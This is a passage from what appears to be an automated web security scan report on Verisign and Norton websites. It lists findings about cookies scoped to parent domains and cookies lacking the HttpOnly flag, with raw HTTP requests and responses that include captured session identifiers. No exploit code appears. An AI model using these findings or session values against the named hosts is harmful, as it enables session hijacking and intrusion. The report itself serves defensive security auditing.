Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 30719
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

body{color:#000;font-family:arial, helvetica, sans-serif;font-size:12px;height:100%;margin:0}
a:link,a:visited{color:#1446A8;text-decoration:underline}
h3{margin:0 0 0.8em;padding:0 0 0 1em;width:98%}
...[SNIP]...

9.80. http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /assets/shared/images/sm_004276_oo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/shared/images/sm_004276_oo.gif HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:47 GMT
Server: Apache
Set-Cookie: v1st=85AC46EBE3E5BE40; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.ch
Last-Modified: Wed, 19 Jan 2011 20:21:22 GMT
ETag: "2e58332-255-49a38c2aff480"
Accept-Ranges: bytes
Content-Length: 597
X-UA-Compatible: IE=EmulateIE7
Content-Type: image/gif

GIF89a    .    .....Bv...!..NETSCAPE2.0.....!..    ....,....    .    ......h.i.X.oU...m.    ..!..    ....,......    ......y........2.M.Z..!..    ....,......    .....b.x...bS..
.!..    ....,......    ...........s.M.
.!..    ....,......    ....
...[SNIP]...

9.81. http://www.verisign.co.uk/hp07/i/vlogo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.co.uk
Path:   /hp07/i/vlogo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hp07/i/vlogo.gif HTTP/1.1
Host: www.verisign.co.uk
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:05 GMT
Server: Apache
Set-Cookie: v1st=3A369731F9FF1259; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
Last-Modified: Mon, 04 Apr 2011 20:53:46 GMT
ETag: "29480d7-13e4-4a01df4a82a80"
Accept-Ranges: bytes
Content-Length: 5092
Content-Type: image/gif

GIF89aZ.)...."""..0.........DDD.........333........%UUU.........#. ..............-...-)*.........fff!..... .....www..(..#"..3/0......&"#.........\YZigh...0,-$ !*&'.............F..*.........PLM......M
...[SNIP]...

9.82. https://www.verisign.com/assets/visual-sciences/vip/zig.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /assets/visual-sciences/vip/zig.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/visual-sciences/vip/zig.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://idprotect.verisign.com/toolbar/activate.v
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:55 GMT
Server: Apache
Set-Cookie: v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:34:24 GMT
Accept-Ranges: bytes
Content-Length: 2602
Expires: Sun, 09 Oct 2011 21:47:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

//REFERENCE PAGE TAG
var ct = "<img src=";
var cd = "//www.verisign.com"; //this should contain the domain of the web site
var cu = "/assets/visual-sciences/vip/zag.gif?Log=1"; //this should contai
...[SNIP]...

10. Cookie without HttpOnly flag set  previous  next
There are 118 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



10.1. https://admin.instantservice.com/Customer  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /Customer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Customer HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:36:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=9A45BF0A3BE120A9EF79A1A51006FFFF; Path=/isservices
Location: https://admin.instantservice.com/customerclient_error.html?null
Content-Length: 0
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8


10.2. https://admin.instantservice.com/links/5851/14753  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /links/5851/14753

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/14753 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:49 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=44FE3736608A2C17EACC6E31AB906A9B; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5905
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>&#86;&#82;&#83;&#78;&#32;&#83;&#97;&#108;&#101;&#115;&#32;&#85;
...[SNIP]...

10.3. https://admin.instantservice.com/links/5851/16144  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /links/5851/16144

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/16144 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0B3AF203D82136BD07783C04277FEF66; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5858
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>&#86;&#82;&#83;&#78;&#32;&#83;&#97;&#108;&#101;&#115;&#32;&#65;
...[SNIP]...

10.4. https://admin.instantservice.com/links/5851/16145  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /links/5851/16145

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/16145 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=13A178978A8AF485E01EA735265A1159; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5853
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>&#86;&#82;&#83;&#78;&#32;&#83;&#97;&#108;&#101;&#115;&#32;&#65;
...[SNIP]...

10.5. https://admin.instantservice.com/links/5851/39897  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /links/5851/39897

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/39897 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=A931592882D97BC2DB5C2B6F4668C8C6; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5946
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>&#86;&#82;&#83;&#78;&#32;&#83;&#97;&#108;&#101;&#115;&#32;&#85;
...[SNIP]...

10.6. http://buy.norton.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?wicket:interface=:0:hf_pnl_mf_nprd_HeaderTopPanel_0:countryDropdown:globalStores:0:globalStore::ILinkListener:: HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:25 GMT
Location: http://buy.norton.com/redirector/estore?COUNTRY=AR&VENDORID=Symantec_symEpVendor&LANGUAGE=ES&CURRENCY=ARS&PROMOID=
Set-Cookie: symSessionGuid=0302548D-BA19-1881-F439-29EE8A29C341; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 455

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/redirector/e
...[SNIP]...

10.7. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:44 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=A14AC841-BBE7-6D86-6DD9-BA8D20C045DF; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 54738

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

10.8. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:47 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 52186

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

10.9. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:49 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 48409

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

10.10. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:52 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=6BFEBE10-1BBE-1163-BE37-B80D146480F2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 63835

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

10.11. http://buy.norton.com/estore/mf/landingProductFeatures  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/landingProductFeatures

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to con